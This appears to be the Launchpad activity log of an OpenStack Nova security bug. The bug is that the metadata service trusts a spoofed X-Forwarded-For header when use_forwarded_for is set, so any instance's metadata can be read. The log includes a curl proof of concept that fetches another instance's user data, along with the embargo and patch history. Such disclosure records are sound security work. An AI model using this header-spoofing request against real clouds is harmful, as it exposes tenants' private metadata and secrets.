2016-03-30 16:03:17 |
Rob Crittenden |
bug |
|
|
added bug |
2016-03-30 17:05:40 |
Tristan Cacqueray |
bug task added |
|
ossa |
|
2016-03-30 17:05:53 |
Tristan Cacqueray |
description |
The nova metadata service uses the remote address to determine which metadata to retrieve. In order to work behind a proxy there is an option use_forwarded_for which will use the X-Forwarded-For header to determine the remote IP.
If this option is set then anyone who can access the metadata port can request metadata for any instance if they know the IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum this side-effect isn't documented anywhere I could find. |
This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.
--
The nova metadata service uses the remote address to determine which metadata to retrieve. In order to work behind a proxy there is an option use_forwarded_for which will use the X-Forwarded-For header to determine the remote IP.
If this option is set then anyone who can access the metadata port can request metadata for any instance if they know the IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum this side-effect isn't documented anywhere I could find. |
|
2016-03-30 17:06:01 |
Tristan Cacqueray |
bug |
|
|
added subscriber Nova Core security contacts |
2016-04-04 15:05:31 |
Tristan Cacqueray |
ossa: status |
New |
Incomplete |
|
2016-06-29 01:52:53 |
Tony Breeds |
bug |
|
|
added subscriber Jamie Lennox |
2016-06-29 06:43:14 |
Tony Breeds |
attachment added |
|
0001-metadata-Limit-servers-that-can-use-X-Forwarded-For.patch https://bugs.launchpad.net/nova/+bug/1563954/+attachment/4692038/+files/0001-metadata-Limit-servers-that-can-use-X-Forwarded-For.patch |
|
2016-06-29 06:54:05 |
Tony Breeds |
nova: importance |
Undecided |
High |
|
2016-06-29 06:54:05 |
Tony Breeds |
nova: status |
New |
Confirmed |
|
2016-06-29 06:54:05 |
Tony Breeds |
nova: assignee |
|
Tony Breeds (o-tony) |
|
2016-06-29 14:03:34 |
Jeremy Stanley |
bug |
|
|
added subscriber OSSG CoreSec |
2016-07-11 16:12:42 |
Tristan Cacqueray |
ossa: status |
Incomplete |
Opinion |
|
2016-07-11 16:44:14 |
Travis McPeak |
bug task added |
|
ossn |
|
2016-08-17 20:31:36 |
Travis McPeak |
ossn: assignee |
|
Travis McPeak (travis-mcpeak) |
|
2016-08-19 16:24:55 |
Travis McPeak |
ossn: assignee |
Travis McPeak (travis-mcpeak) |
|
|
2016-08-19 16:25:06 |
Travis McPeak |
ossn: assignee |
|
Robert Clark (robert-clark) |
|
2016-09-23 13:29:45 |
Robert Clark |
ossn: status |
New |
Confirmed |
|
2016-09-23 13:29:49 |
Robert Clark |
ossn: importance |
Undecided |
High |
|
2016-12-15 16:55:41 |
Luke Hinds |
ossn: status |
Confirmed |
In Progress |
|
2016-12-19 09:28:35 |
Luke Hinds |
ossn: status |
In Progress |
Fix Released |
|
2016-12-19 09:28:48 |
Luke Hinds |
information type |
Private Security |
Public Security |
|
2016-12-19 15:07:15 |
Fungi Three |
information type |
Public Security |
Public |
|
2016-12-19 15:07:26 |
Fungi Three |
tags |
|
security |
|
2017-01-20 01:03:45 |
Tristan Cacqueray |
description |
This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.
--
The nova metadata service uses the remote address to determine which metadata to retrieve. In order to work behind a proxy there is an option use_forwarded_for which will use the X-Forwarded-For header to determine the remote IP.
If this option is set then anyone who can access the metadata port can request metadata for any instance if they know the IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum this side-effect isn't documented anywhere I could find. |
The nova metadata service uses the remote address to determine which metadata to retrieve. In order to work behind a proxy there is an option use_forwarded_for which will use the X-Forwarded-For header to determine the remote IP.
If this option is set then anyone who can access the metadata port can request metadata for any instance if they know the IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum this side-effect isn't documented anywhere I could find. |
|
2017-06-23 16:29:35 |
Sean Dague |
nova: assignee |
Tony Breeds (o-tony) |
|
|
2019-12-08 08:17:37 |
Jamie Lennox |
removed subscriber Jamie Lennox |
|
|
|